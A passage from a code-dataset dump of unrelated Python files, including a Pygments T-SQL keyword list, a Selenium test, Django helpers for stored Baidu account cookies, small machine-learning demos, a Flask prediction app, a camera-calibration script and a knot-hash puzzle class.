'execute',\n 'exists',\n 'exit',\n 'external',\n 'fetch',\n 'file',\n 'fillfactor',\n 'for',\n 'foreign',\n 'freetext',\n 'freetexttable',\n 'from',\n 'full',\n 'function',\n 'goto',\n 'grant',\n 'group',\n 'having',\n 'holdlock',\n 'identity',\n 'identity_insert',\n 'identitycol',\n 'if',\n 'in',\n 'index',\n 'inner',\n 'insert',\n 'intersect',\n 'into',\n 'is',\n 'join',\n 'key',\n 'kill',\n 'left',\n 'like',\n 'lineno',\n 'load',\n 'merge',\n 'national',\n 'nocheck',\n 'nonclustered',\n 'not',\n 'null',\n 'nullif',\n 'of',\n 'off',\n 'offsets',\n 'on',\n 'open',\n 'opendatasource',\n 'openquery',\n 'openrowset',\n 'openxml',\n 'option',\n 'or',\n 'order',\n 'outer',\n 'over',\n 'percent',\n 'pivot',\n 'plan',\n 'precision',\n 'primary',\n 'print',\n 'proc',\n 'procedure',\n 'public',\n 'raiserror',\n 'read',\n 'readtext',\n 'reconfigure',\n 'references',\n 'replication',\n 'restore',\n 'restrict',\n 'return',\n 'revert',\n 'revoke',\n 'right',\n 'rollback',\n 'rowcount',\n 'rowguidcol',\n 'rule',\n 'save',\n 'schema',\n 'securityaudit',\n 'select',\n 'semantickeyphrasetable',\n 'semanticsimilaritydetailstable',\n 'semanticsimilaritytable',\n 'session_user',\n 'set',\n 'setuser',\n 'shutdown',\n 'some',\n 'statistics',\n 'system_user',\n 'table',\n 'tablesample',\n 'textsize',\n 'then',\n 'throw',\n 'to',\n 'top',\n 'tran',\n 'transaction',\n 'trigger',\n 'truncate',\n 'try',\n 'try_convert',\n 'tsequal',\n 'union',\n 'unique',\n 'unpivot',\n 'update',\n 'updatetext',\n 'use',\n 'user',\n 'values',\n 'varying',\n 'view',\n 'waitfor',\n 'when',\n 'where',\n 'while',\n 'with',\n 'within',\n 'writetext',\n)\n\n_KEYWORDS_FUTURE = (\n 'absolute',\n 'action',\n 'admin',\n 'after',\n 'aggregate',\n 'alias',\n 'allocate',\n 'are',\n 'array',\n 'asensitive',\n 'assertion',\n 'asymmetric',\n 'at',\n 'atomic',\n 'before',\n 'binary',\n 'bit',\n 'blob',\n 'boolean',\n 'both',\n 'breadth',\n 'call',\n 'called',\n 'cardinality',\n 'cascaded',\n 'cast',\n 'catalog',\n 'char',\n 'character',\n 'class',\n 'clob',\n 'collation',\n 'collect',\n 'completion',\n 'condition',\n 'connect',\n 'connection',\n 'constraints',\n 'constructor',\n 'corr',\n 'corresponding',\n 'covar_pop',\n 'covar_samp',\n 'cube',\n 'cume_dist',\n 'current_catalog',\n 'current_default_transform_group',\n 'current_path',\n 'current_role',\n 'current_schema',\n 'current_transform_group_for_type',\n 'cycle',\n 'data',\n 'date',\n 'day',\n 'dec',\n 'decimal',\n 'deferrable',\n 'deferred',\n 'depth',\n 'deref',\n 'describe',\n 'descriptor',\n 'destroy',\n 'destructor',\n 'deterministic',\n 'diagnostics',\n 'dictionary',\n 'disconnect',\n 'domain',\n 'dynamic',\n 'each',\n 'element',\n 'end-exec',\n 'equals',\n 'every',\n 'exception',\n 'false',\n 'filter',\n 'first',\n 'float',\n 'found',\n 'free',\n 'fulltexttable',\n 'fusion',\n 'general',\n 'get',\n 'global',\n 'go',\n 'grouping',\n 'hold',\n 'host',\n 'hour',\n 'ignore',\n 'immediate',\n 'indicator',\n 'initialize',\n 'initially',\n 'inout',\n 'input',\n 'int',\n 'integer',\n 'intersection',\n 'interval',\n 'isolation',\n 'iterate',\n 'language',\n 'large',\n 'last',\n 'lateral',\n 'leading',\n 'less',\n 'level',\n 'like_regex',\n 'limit',\n 'ln',\n 'local',\n 'localtime',\n 'localtimestamp',\n 'locator',\n 'map',\n 'match',\n 'member',\n 'method',\n 'minute',\n 'mod',\n 'modifies',\n 'modify',\n 'module',\n 'month',\n 'multiset',\n 'names',\n 'natural',\n 'nchar',\n 'nclob',\n 'new',\n 'next',\n 'no',\n 'none',\n 'normalize',\n 'numeric',\n 'object',\n 'occurrences_regex',\n 'old',\n 
'only',\n 'operation',\n 'ordinality',\n 'out',\n 'output',\n 'overlay',\n 'pad',\n 'parameter',\n 'parameters',\n 'partial',\n 'partition',\n 'path',\n 'percent_rank',\n 'percentile_cont',\n 'percentile_disc',\n 'position_regex',\n 'postfix',\n 'prefix',\n 'preorder',\n 'prepare',\n 'preserve',\n 'prior',\n 'privileges',\n 'range',\n 'reads',\n 'real',\n 'recursive',\n 'ref',\n 'referencing',\n 'regr_avgx',\n 'regr_avgy',\n 'regr_count',\n 'regr_intercept',\n 'regr_r2',\n 'regr_slope',\n 'regr_sxx',\n 'regr_sxy',\n 'regr_syy',\n 'relative',\n 'release',\n 'result',\n 'returns',\n 'role',\n 'rollup',\n 'routine',\n 'row',\n 'rows',\n 'savepoint',\n 'scope',\n 'scroll',\n 'search',\n 'second',\n 'section',\n 'sensitive',\n 'sequence',\n 'session',\n 'sets',\n 'similar',\n 'size',\n 'smallint',\n 'space',\n 'specific',\n 'specifictype',\n 'sql',\n 'sqlexception',\n 'sqlstate',\n 'sqlwarning',\n 'start',\n 'state',\n 'statement',\n 'static',\n 'stddev_pop',\n 'stddev_samp',\n 'structure',\n 'submultiset',\n 'substring_regex',\n 'symmetric',\n 'system',\n 'temporary',\n 'terminate',\n 'than',\n 'time',\n 'timestamp',\n 'timezone_hour',\n 'timezone_minute',\n 'trailing',\n 'translate_regex',\n 'translation',\n 'treat',\n 'true',\n 'uescape',\n 'under',\n 'unknown',\n 'unnest',\n 'usage',\n 'using',\n 'value',\n 'var_pop',\n 'var_samp',\n 'varchar',\n 'variable',\n 'whenever',\n 'width_bucket',\n 'window',\n 'within',\n 'without',\n 'work',\n 'write',\n 'xmlagg',\n 'xmlattributes',\n 'xmlbinary',\n 'xmlcast',\n 'xmlcomment',\n 'xmlconcat',\n 'xmldocument',\n 'xmlelement',\n 'xmlexists',\n 'xmlforest',\n 'xmliterate',\n 'xmlnamespaces',\n 'xmlparse',\n 'xmlpi',\n 'xmlquery',\n 'xmlserialize',\n 'xmltable',\n 'xmltext',\n 'xmlvalidate',\n 'year',\n 'zone',\n)\n\n_KEYWORDS_ODBC = (\n 'absolute',\n 'action',\n 'ada',\n 'add',\n 'all',\n 'allocate',\n 'alter',\n 'and',\n 'any',\n 'are',\n 'as',\n 'asc',\n 'assertion',\n 'at',\n 'authorization',\n 'avg',\n 'begin',\n 'between',\n 'bit',\n 'bit_length',\n 'both',\n 'by',\n 'cascade',\n 'cascaded',\n 'case',\n 'cast',\n 'catalog',\n 'char',\n 'char_length',\n 'character',\n 'character_length',\n 'check',\n 'close',\n 'coalesce',\n 'collate',\n 'collation',\n 'column',\n 'commit',\n 'connect',\n 'connection',\n 'constraint',\n 'constraints',\n 'continue',\n 'convert',\n 'corresponding',\n 'count',\n 'create',\n 'cross',\n 'current',\n 'current_date',\n 'current_time',\n 'current_timestamp',\n 'current_user',\n 'cursor',\n 'date',\n 'day',\n 'deallocate',\n 'dec',\n 'decimal',\n 'declare',\n 'default',\n 'deferrable',\n 'deferred',\n 'delete',\n 'desc',\n 'describe',\n 'descriptor',\n 'diagnostics',\n 'disconnect',\n 'distinct',\n 'domain',\n 'double',\n 'drop',\n 'else',\n 'end',\n 'end-exec',\n 'escape',\n 'except',\n 'exception',\n 'exec',\n 'execute',\n 'exists',\n 'external',\n 'extract',\n 'false',\n 'fetch',\n 'first',\n 'float',\n 'for',\n 'foreign',\n 'fortran',\n 'found',\n 'from',\n 'full',\n 'get',\n 'global',\n 'go',\n 'goto',\n 'grant',\n 'group',\n 'having',\n 'hour',\n 'identity',\n 'immediate',\n 'in',\n 'include',\n 'index',\n 'indicator',\n 'initially',\n 'inner',\n 'input',\n 'insensitive',\n 'insert',\n 'int',\n 'integer',\n 'intersect',\n 'interval',\n 'into',\n 'is',\n 'isolation',\n 'join',\n 'key',\n 'language',\n 'last',\n 'leading',\n 'left',\n 'level',\n 'like',\n 'local',\n 'lower',\n 'match',\n 'max',\n 'min',\n 'minute',\n 'module',\n 'month',\n 'names',\n 'national',\n 'natural',\n 'nchar',\n 'next',\n 'no',\n 'none',\n 
'not',\n 'null',\n 'nullif',\n 'numeric',\n 'octet_length',\n 'of',\n 'on',\n 'only',\n 'open',\n 'option',\n 'or',\n 'order',\n 'outer',\n 'output',\n 'overlaps',\n 'pad',\n 'partial',\n 'pascal',\n 'position',\n 'precision',\n 'prepare',\n 'preserve',\n 'primary',\n 'prior',\n 'privileges',\n 'procedure',\n 'public',\n 'read',\n 'real',\n 'references',\n 'relative',\n 'restrict',\n 'revoke',\n 'right',\n 'rollback',\n 'rows',\n 'schema',\n 'scroll',\n 'second',\n 'section',\n 'select',\n 'session',\n 'session_user',\n 'set',\n 'size',\n 'smallint',\n 'some',\n 'space',\n 'sql',\n 'sqlca',\n 'sqlcode',\n 'sqlerror',\n 'sqlstate',\n 'sqlwarning',\n 'substring',\n 'sum',\n 'system_user',\n 'table',\n 'temporary',\n 'then',\n 'time',\n 'timestamp',\n 'timezone_hour',\n 'timezone_minute',\n 'to',\n 'trailing',\n 'transaction',\n 'translate',\n 'translation',\n 'trim',\n 'true',\n 'union',\n 'unique',\n 'unknown',\n 'update',\n 'upper',\n 'usage',\n 'user',\n 'using',\n 'value',\n 'values',\n 'varchar',\n 'varying',\n 'view',\n 'when',\n 'whenever',\n 'where',\n 'with',\n 'work',\n 'write',\n 'year',\n 'zone',\n)\n\n# See https://msdn.microsoft.com/en-us/library/ms189822.aspx.\nKEYWORDS = sorted(set(_KEYWORDS_FUTURE + _KEYWORDS_ODBC + _KEYWORDS_SERVER))\n\n# See https://msdn.microsoft.com/en-us/library/ms187752.aspx.\nTYPES = (\n 'bigint',\n 'binary',\n 'bit',\n 'char',\n 'cursor',\n 'date',\n 'datetime',\n 'datetime2',\n 'datetimeoffset',\n 'decimal',\n 'float',\n 'hierarchyid',\n 'image',\n 'int',\n 'money',\n 'nchar',\n 'ntext',\n 'numeric',\n 'nvarchar',\n 'real',\n 'smalldatetime',\n 'smallint',\n 'smallmoney',\n 'sql_variant',\n 'table',\n 'text',\n 'time',\n 'timestamp',\n 'tinyint',\n 'uniqueidentifier',\n 'varbinary',\n 'varchar',\n 'xml',\n)\n\n# See https://msdn.microsoft.com/en-us/library/ms174318.aspx.\nFUNCTIONS = (\n '$partition',\n 'abs',\n 'acos',\n 'app_name',\n 'applock_mode',\n 'applock_test',\n 'ascii',\n 'asin',\n 'assemblyproperty',\n 'atan',\n 'atn2',\n 'avg',\n 'binary_checksum',\n 'cast',\n 'ceiling',\n 'certencoded',\n 'certprivatekey',\n 'char',\n 'charindex',\n 'checksum',\n 'checksum_agg',\n 'choose',\n 'col_length',\n 'col_name',\n 'columnproperty',\n 'compress',\n 'concat',\n 'connectionproperty',\n 'context_info',\n 'convert',\n 'cos',\n 'cot',\n 'count',\n 'count_big',\n 'current_request_id',\n 'current_timestamp',\n 'current_transaction_id',\n 'current_user',\n 'cursor_status',\n 'database_principal_id',\n 'databasepropertyex',\n 'dateadd',\n 'datediff',\n 'datediff_big',\n 'datefromparts',\n 'datename',\n 'datepart',\n 'datetime2fromparts',\n 'datetimefromparts',\n 'datetimeoffsetfromparts',\n 'day',\n 'db_id',\n 'db_name',\n 'decompress',\n 'degrees',\n 'dense_rank',\n 'difference',\n 'eomonth',\n 'error_line',\n 'error_message',\n 'error_number',\n 'error_procedure',\n 'error_severity',\n 'error_state',\n 'exp',\n 'file_id',\n 'file_idex',\n 'file_name',\n 'filegroup_id',\n 'filegroup_name',\n 'filegroupproperty',\n 'fileproperty',\n 'floor',\n 'format',\n 'formatmessage',\n 'fulltextcatalogproperty',\n 'fulltextserviceproperty',\n 'get_filestream_transaction_context',\n 'getansinull',\n 'getdate',\n 'getutcdate',\n 'grouping',\n 'grouping_id',\n 'has_perms_by_name',\n 'host_id',\n 'host_name',\n 'iif',\n 'index_col',\n 'indexkey_property',\n 'indexproperty',\n 'is_member',\n 'is_rolemember',\n 'is_srvrolemember',\n 'isdate',\n 'isjson',\n 'isnull',\n 'isnumeric',\n 'json_modify',\n 'json_query',\n 'json_value',\n 'left',\n 'len',\n 'log',\n 'log10',\n 
'lower',\n    'ltrim',\n    'max',\n    'min',\n    'min_active_rowversion',\n    'month',\n    'nchar',\n    'newid',\n    'newsequentialid',\n    'ntile',\n    'object_definition',\n    'object_id',\n    'object_name',\n    'object_schema_name',\n    'objectproperty',\n    'objectpropertyex',\n    'opendatasource',\n    'openjson',\n    'openquery',\n    'openrowset',\n    'openxml',\n    'original_db_name',\n    'original_login',\n    'parse',\n    'parsename',\n    'patindex',\n    'permissions',\n    'pi',\n    'power',\n    'pwdcompare',\n    'pwdencrypt',\n    'quotename',\n    'radians',\n    'rand',\n    'rank',\n    'replace',\n    'replicate',\n    'reverse',\n    'right',\n    'round',\n    'row_number',\n    'rowcount_big',\n    'rtrim',\n    'schema_id',\n    'schema_name',\n    'scope_identity',\n    'serverproperty',\n    'session_context',\n    'session_user',\n    'sign',\n    'sin',\n    'smalldatetimefromparts',\n    'soundex',\n    'sp_helplanguage',\n    'space',\n    'sqrt',\n    'square',\n    'stats_date',\n    'stdev',\n    'stdevp',\n    'str',\n    'string_escape',\n    'string_split',\n    'stuff',\n    'substring',\n    'sum',\n    'suser_id',\n    'suser_name',\n    'suser_sid',\n    'suser_sname',\n    'switchoffset',\n    'sysdatetime',\n    'sysdatetimeoffset',\n    'system_user',\n    'sysutcdatetime',\n    'tan',\n    'textptr',\n    'textvalid',\n    'timefromparts',\n    'todatetimeoffset',\n    'try_cast',\n    'try_convert',\n    'try_parse',\n    'type_id',\n    'type_name',\n    'typeproperty',\n    'unicode',\n    'upper',\n    'user_id',\n    'user_name',\n    'var',\n    'varp',\n    'xact_state',\n    'year',\n)\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/_tsql_builtins.py","file_name":"_tsql_builtins.py","file_ext":"py","file_size_in_byte":15129,"program_lang":"python","lang":"hi","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"}
{"seq_id":"8803604168","text":"from selenium.webdriver.remote.webdriver import WebDriver\nfrom lib.factory.factory_driver import get_driver\nfrom lib.config import config\nfrom lib.pom.qaminds.home_page import HomePage\n\n\nclass TestSearch:\n\n    def setup_method(self):\n        self.driver: WebDriver = get_driver()\n        self.driver.get(config.get_url())\n\n    def test_search(self):  # prefixed with test_ so pytest collects it\n        # search for Samsung components\n        home_page = HomePage(self.driver)\n        assert home_page.is_logo_visible(), 'Logo should be visible'\n        home_page.search('Samsung')\n\n        # search for the Canon product\n        home_page = HomePage(self.driver)\n        assert home_page.is_logo_visible(), 'Logo should be visible'\n        home_page.search('Canon')\n\n        home_page = HomePage(self.driver)\n        assert home_page.is_logo_visible(), 'Logo should be visible'\n        home_page.search('mac')\n\n        home_page = HomePage(self.driver)\n        assert home_page.is_logo_visible(), 'Logo should be visible'\n        home_page.search('ipod')\n\n        home_page = HomePage(self.driver)\n        assert home_page.is_logo_visible(), 'Logo should be visible'\n        home_page.search('palm')\n\n        home_page = HomePage(self.driver)\n        assert home_page.select_product(\"Palm Treo Pro\"), \"Product should be visible\"\n        home_page._click()\n\n        \"\"\"for search in [\"Canon\", \"samsung\", \"iMac\", \"ipod\", \"palm\"]:\n            self.home_page.search(search)\"\"\"\n\n    def teardown_method(self):\n        if self.driver:\n            self.driver.quit() ","repo_name":"FGabyMartinez/python-selenium-2022","sub_path":"test_Opencart/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"38806890393","text":"from account.models import AccountCookie\nfrom baiduwp_python.settings.settings import logger\nfrom baiduwp_python.utils.date_utils import get_datetime_now_str\n\n\ndef 
get_account_cookie(username, vip_type, is_valid, order_by='-update_time'):\n    match_dict = {\"is_active\": True}\n    if username:\n        match_dict.update({\"username__contains\": username})\n    if vip_type:\n        match_dict.update({\"vip_type\": vip_type})\n    if is_valid:\n        match_dict.update({\"is_valid\": is_valid})\n    try:\n        account_cookie_list = list(AccountCookie.objects.filter(**match_dict).order_by(order_by).values().all())\n        return True, account_cookie_list\n    except Exception as e:\n        logger.error(f\"get_account_cookie() met error: {e}\")\n        return False, \"Database operation failed\"\n\n\ndef add_account_cookie(baidu_name, net_disk_name, uk, vip_type, bdclnd, cookie):\n    try:\n        count = AccountCookie.objects.filter(uk=uk, is_active=True).count()\n        if count:\n            return False, \"Please do not add duplicates\"\n        date_time_now = get_datetime_now_str()\n        AccountCookie.objects.create(\n            baidu_name=baidu_name, net_disk_name=net_disk_name, uk=uk, vip_type=vip_type, is_valid=True, bdclnd=bdclnd,\n            cookie=cookie, create_time=date_time_now, update_time=date_time_now,\n            is_active=True\n        )\n        return True, \"Added successfully\"\n    except Exception as e:\n        logger.error(f\"add_account_cookie() met error: {e}\")\n        return False, \"Database operation failed\"\n\n\ndef del_account_cookie(ids: list):\n    try:\n        count = AccountCookie.objects.filter(is_active=True, id__in=ids).update(is_active=False)\n        return True, count\n    except Exception as e:\n        logger.error(f\"del_account_cookie() met error: {e}\")\n        return False, \"Database operation failed\"\n","repo_name":"panmeibing/baiduwp_python","sub_path":"baiduwp_python/baiduwp_python/apps/account/utils/account_orm.py","file_name":"account_orm.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"26595667739","text":"#################################\n# ---- Made By Skult78911 ---- ## \n# ---- All Rights Reserved ---- ##\n# ---- Written In VS Code ---- ## \n# ---- Written In Python3 ---- ## \n#################################\n\nimport numpy as np # Importing the NumPy Library\nimport matplotlib.pyplot as plt # Importing the Matplotlib Library\n\nN = 5 # Number of Points for the 1st and 2nd Classes\nb = 3 # Offset Variable b\n\n# -- Modeling Class 1 -- #\nx1 = np.random.random(N) # Modeling a Random Value Along One Axis x1\nx2 = x1 + [np.random.randint(10)/10 for i in range(N)] + b # x2 Modeled as x1 Plus a Random Deviation, And at the End We Add the Variable b\nC1 = [x1, x2] # Forming a Double List C1 From the Set of These Points (These Points x1 And x2)\n\n# -- Modeling Class 2 -- #\nx1 = np.random.random(N) # Modeling a Random Value Along One Axis x1\nx2 = x1 - [np.random.randint(10)/10 for i in range(N)] - 0.1 + b # x2 Modeled as x1 Minus a Random Deviation, And at the End We Add the Variable b\n                                                                 # And Additionally We Subtract 0.1 So That This Point x2 Is Below Our Line\n\nC2 = [x1, x2] # Forming a Double List C2 From the Set of These Points (These Points x1 And x2)\n\nf = [0+b, 1+b] # We Form a Straight Line at 45 Degrees to See How the Dividing Line Runs, Also Adding the Variable b\n\n# -- Determine 2 Coefficients -- #\nw2 = 0.5 # Let the Omega 2 Coefficient Be 0.5\nw3 = -b*w2 # After That We Automatically Calculate Omega 3 as Minus b Times Omega 2\n\nw = np.array([-w2, w2, w3]) # All the Weight Coefficients (-w2, w2 and w3)\nfor i in range(N):\n    x = np.array([C1[0][i], C1[1][i], 1]) # Passing Each Point of Class C1 Through the Neuron\n    y = np.dot(w, x) # Calculate This Output Value y\n    if y >= 0: # If the value of y is greater than or equal to 
zero, then this is class C1\n        print(\"Class C1\") # And output it to the console\n    else: # Otherwise It's Class C2 \n        print(\"Class C2\") # And output it to the console\n\nplt.scatter(C1[0][:], C1[1][:], s=10, c='red') # Display All Points C1\nplt.scatter(C2[0][:], C2[1][:], s=10, c='blue') # Display All Points C2\nplt.plot(f) # Draw the Separating Line With the plot Function\nplt.grid(True) # Draw a Grid on the Plot\nplt.show() # Show the Window With All the Points (Like a Windows Application)","repo_name":"Skult78911/CMNN-Libary","sub_path":"Source/NN XOR/Neural Network Perseptron - Classification, XOR Task - 2.py","file_name":"Neural Network Perseptron - Classification, XOR Task - 2.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"10176798063","text":"from flask import Flask, render_template, request, jsonify\nimport pandas as pd\nfrom joblib import load\n\napp = Flask(__name__, template_folder=\"templates\")\n\n# Load the model\nrf = load(\"../Models/random_forest_model.joblib\")\n\n# Load the data\ndf = pd.read_csv(\"../data/life_expectancy_cleaned.csv\")\n\n# Extract unique country names and convert them to a list\ncountry_list = df[\"Country\"].unique().tolist()\n\n\ndef predict_life_expectancy(input_data):\n    # Convert the input-data dict into a DataFrame\n    df = pd.DataFrame(input_data, index=[0])\n    # Apply one-hot encoding to the input data\n    df_encoded = pd.get_dummies(df)\n\n    # Load the list of features\n    all_features = load(\"../Models/feature_list.joblib\")\n\n    # Add missing columns and fill them with zeros\n    for col in all_features:\n        if col not in df_encoded.columns:\n            df_encoded[col] = 0\n\n    # Sort the columns to make sure they are in the same order as in the training data\n    df_encoded = df_encoded[all_features]\n\n    # Remove the target variable from the input variables\n    df_encoded = df_encoded.drop(columns=[\"Life expectancy\"])\n\n    # Run the prediction\n    prediction = rf.predict(df_encoded)\n    prediction = prediction * 100  # Convert back to years\n\n    return prediction\n\n\n@app.route(\"/\")\ndef home():\n    return render_template(\"index.html\", country_list=country_list)\n\n\ndef convert_to_float(val):\n    try:\n        return float(val)\n    except ValueError:\n        return val\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n    # Extract the data from the request\n    data = request.form.to_dict()\n    data = {k: [convert_to_float(v)] for k, v in data.items()}\n\n    # Run the prediction\n    prediction = predict_life_expectancy(data)\n\n    # Turn the prediction into JSON and return it\n    return jsonify({\"prediction\": prediction.tolist()})\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"peledin/LifeExpectancy","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"1031806878","text":"from sklearn.svm import SVC\r\nfrom matplotlib.colors import ListedColormap\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nnp.random.seed(1)\r\nxXor = np.random.randn(200, 2)\r\nyXor = np.logical_xor(xXor[:, 0] > 0, xXor[:, 1] > 0)\r\nyXor = np.where(yXor, 1, -1)\r\nplt.scatter(xXor[yXor == 1, 0], xXor[yXor == 1, 1], c='b', marker='x', label='1')\r\nplt.scatter(xXor[yXor == -1, 0], xXor[yXor == -1, 1], c='r', marker='s', 
label='-1')\r\nplt.xlim([-3, 3])\r\nplt.ylim([-3, 3])\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\n\r\ndef plotDecisionRegions(x, y, classifier, test_idx=None, resolution=0.02):\r\n    markers = ('s', 'x', 'o', '^', 'v')\r\n    colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n    cmap = ListedColormap(colors[:len(np.unique(y))])\r\n\r\n    x1Min, x1Max = x[:, 0].min() - 1, x[:, 0].max() + 1\r\n    x2Min, x2Max = x[:, 1].min() - 1, x[:, 1].max() + 1\r\n    xx1, xx2 = np.meshgrid(np.arange(x1Min, x1Max, resolution), np.arange(x2Min, x2Max, resolution))\r\n    z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n    z = z.reshape(xx1.shape)\r\n    plt.contourf(xx1, xx2, z, alpha=0.3, cmap=cmap)\r\n    plt.xlim(xx1.min(), xx1.max())\r\n    plt.ylim(xx2.min(), xx2.max())\r\n\r\n    for idx, c1 in enumerate(np.unique(y)):\r\n        plt.scatter(x=x[y == c1, 0], y=x[y == c1, 1], alpha=0.8, c=colors[idx], marker=markers[idx], label=c1,\r\n                    edgecolor='black')\r\n    if test_idx:\r\n        xTest, yTest = x[test_idx, :], y[test_idx]\r\n        plt.scatter(xTest[:, 0],\r\n                    xTest[:, 1],\r\n                    c=\"black\",\r\n                    edgecolor='black',\r\n                    alpha=1.0,\r\n                    linewidth=1,\r\n                    marker='o',\r\n                    s=100,\r\n                    label='Test set')\r\n\r\n\r\nsvm = SVC(kernel='rbf', random_state=1, gamma=0.10, C=10.0)\r\nsvm.fit(xXor, yXor)\r\nplotDecisionRegions(xXor, yXor, classifier=svm)\r\nplt.legend(loc='upper left')\r\nplt.show()\r\n","repo_name":"expresoviter/KPI_Study","sub_path":"Semester_4/Applied tasks of Machine Learning/Lab3/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"15450153011","text":"#!/usr/bin/env python\n# coding: utf-8\n#import sys\n#sys.path.append(\"../\")\n\nimport flexiblecc as fcc\nimport glob\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport flexiblecc.Parametric as parcc\nimport os\nimport uuid\nimport json\nimport shutil\nfrom flexiblecc.CentralModel import BundleAdjustment\n\nfolder_out = \"TestRes\"\nrun_name = str(uuid.uuid4())\nfolder_out = os.path.join(folder_out, run_name)\nos.makedirs(folder_out, exist_ok=True)\n\nimport sys\n#sys.stdout = open(os.path.join(folder_out, \"console.txt\"), 'w')\n\ndatasetpath = \"../CalImgs/ChArUco - Sorted/Samsung Galaxy S10 Plus/WideAngle/Fold_1/*.jpg\"\n\nparas = {\n    \"cm_stepsize\": 252,\n    \"cm_order\": 2,\n    \"ls_ftol\": 1e-8,\n    \"ls_gtol\": 1e-8,\n    \"datasetpath\":datasetpath,\n}\n\nprint(\"paras:\", paras)\n\nwith open(os.path.join(folder_out, \"para.json\"), \"w\", encoding='utf-8') as f:\n    json.dump(paras, f, ensure_ascii=False, indent=4)\n\nshutil.copy2(os.path.realpath(__file__), os.path.join(folder_out, \"run_script.txt\"))\n\nimage_files = glob.glob(paras[\"datasetpath\"])\n\ncolor_images = [cv2.imread(f) for f in tqdm(image_files)]\ngayscale_images = [cv2.cvtColor(c_img, cv2.COLOR_BGR2GRAY) for c_img in tqdm(color_images)]\n\nimage_shape = color_images[0].shape[:2]\n\nsquaresX = 28 # [#]\nsquaresY = 19 # [#]\nsquareLength = 0.01 # [m]\nmarkerLength = 0.0075 # [m]\ndictionary = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_1000)\n\ncalibrate_retval, cameraMatrix, distCoeffs, rvecs, tvecs, stdDeviationsIntrinsics, stdDeviationsExtrinsics, perViewErrors, charucoCorners_all, charucoIds_all, markerCorners_all, armarkerIds_all, obj_points_all, board, not_used = parcc.calibrate_camera_charuco(\n    gayscale_images, squaresX, squaresY,\n    squareLength, markerLength, dictionary, 
verbose=1)\n\nplt.figure()\nfcc.Metrics.rtvecs_illustration.draw_rtvecs(rvecs, tvecs, obj_points_all)\nplt.tight_layout()\nplt.savefig(os.path.join(folder_out, \"ParBoards.png\"))\nplt.close()\n\nimg_points_all, diff_all, angels_all, mag_all = fcc.Metrics.voronoi.projectPoints_and_cal_angles_and_mag(\n charucoCorners_all, obj_points_all, rvecs, tvecs, cameraMatrix, distCoeffs)\n\nplt.figure()\nfcc.Metrics.voronoi.plot_voronoi(img_points_all, angels_all)\nplt.savefig(os.path.join(folder_out, \"Par_Voronoi.png\"))\nplt.close()\n\n\nprint(f\"RMS: {calibrate_retval:0.4f} pixels\")\n\n\n\nba = BundleAdjustment(obj_points_all, rvecs, tvecs, charucoCorners_all, cameraMatrix, distCoeffs, image_shape,\n cm_stepsize=paras[\"cm_stepsize\"], cm_order=paras[\"cm_order\"], ls_ftol=paras[\"ls_ftol\"], ls_gtol=paras[\"ls_gtol\"])\n\ncm, res, rvecs_new, tvecs_new = ba.least_squares(folder_out)\n\nfcc.CentralModel.cm_save(cm, os.path.join(folder_out, \"cm\"))\n\n\nrmsCM, residuals_2D, estimated_points_2D, correct_points_2D = ba.calc_residuals_2D(np.array(res.x), return_points_2D=True, verbose=1)\n\nnp.save(os.path.join(folder_out, \"calc_residuals_2D.npy\"), [rmsCM, residuals_2D, estimated_points_2D, correct_points_2D])\n\nrms_vs = f\"{calibrate_retval:0.5f} VS {rmsCM:0.5f}\"\nwith open(os.path.join(folder_out, rms_vs+\".txt\"), \"w\") as f:\n f.write(rms_vs)\nprint(rms_vs)\n\nimage_points = np.concatenate(correct_points_2D)\nproject_points = np.concatenate(estimated_points_2D)\n\nimp, diff, angels, mag = fcc.Metrics.voronoi.cal_angles_and_mag(image_points, project_points)\n\nplt.figure()\nfcc.Metrics.voronoi.plot_voronoi(imp, angels)\nplt.savefig(os.path.join(folder_out, \"CM_Voronoi.png\"))\nplt.close()\n\n#sys.stdout.close()","repo_name":"SimonLBSoerensen/Flexible-Camera-Calibration","sub_path":"Test/bundleAdjustment.py","file_name":"bundleAdjustment.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"26532818578","text":"def init_lst():\n return [i for i in range(0, 256)]\n\n\nclass KnotTier:\n def __init__(self):\n self.pos = 0\n self.skip = 0\n\n def tie_a_knot(self, start, length, lst):\n if length < 2:\n return\n end = (start + length - 1) % len(lst)\n lst[start], lst[end] = lst[end], lst[start]\n if length == 2:\n return\n start += 1\n start %= len(lst)\n self.tie_a_knot(start, length - 2, lst)\n\n def tie_knots(self, lst, lengths):\n for length in lengths:\n self.tie_a_knot(self.pos, length, lst)\n self.pos += length + self.skip\n self.pos %= len(lst)\n self.skip += 1\n","repo_name":"howsad/aoc2017","sub_path":"src/day10/day10_commons.py","file_name":"day10_commons.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70278593709","text":"import collections\n\nimport pypath.share.curl as curl\nimport pypath.resources.urls as urls\n\n\ndef pazar_interactions():\n\n PazarInteraction = collections.namedtuple(\n 